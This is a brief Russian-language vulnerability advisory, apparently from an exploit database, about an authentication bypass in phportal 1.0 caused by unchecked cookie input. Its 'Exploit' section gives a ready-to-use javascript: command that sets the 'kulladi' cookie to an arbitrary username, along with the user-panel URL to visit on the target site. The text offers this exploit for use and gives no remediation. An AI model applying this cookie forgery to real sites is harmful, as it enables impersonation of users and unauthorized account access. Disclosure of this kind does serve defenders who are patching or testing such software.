Программа: phportal 1.0

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.

Эксплоит:

javascript:document.cookie="kulladi=[Username];path=/";
Вход.

Проследуйте: http://target.com/uye_paneli.php?islem=bilgilerim

Оставить мнение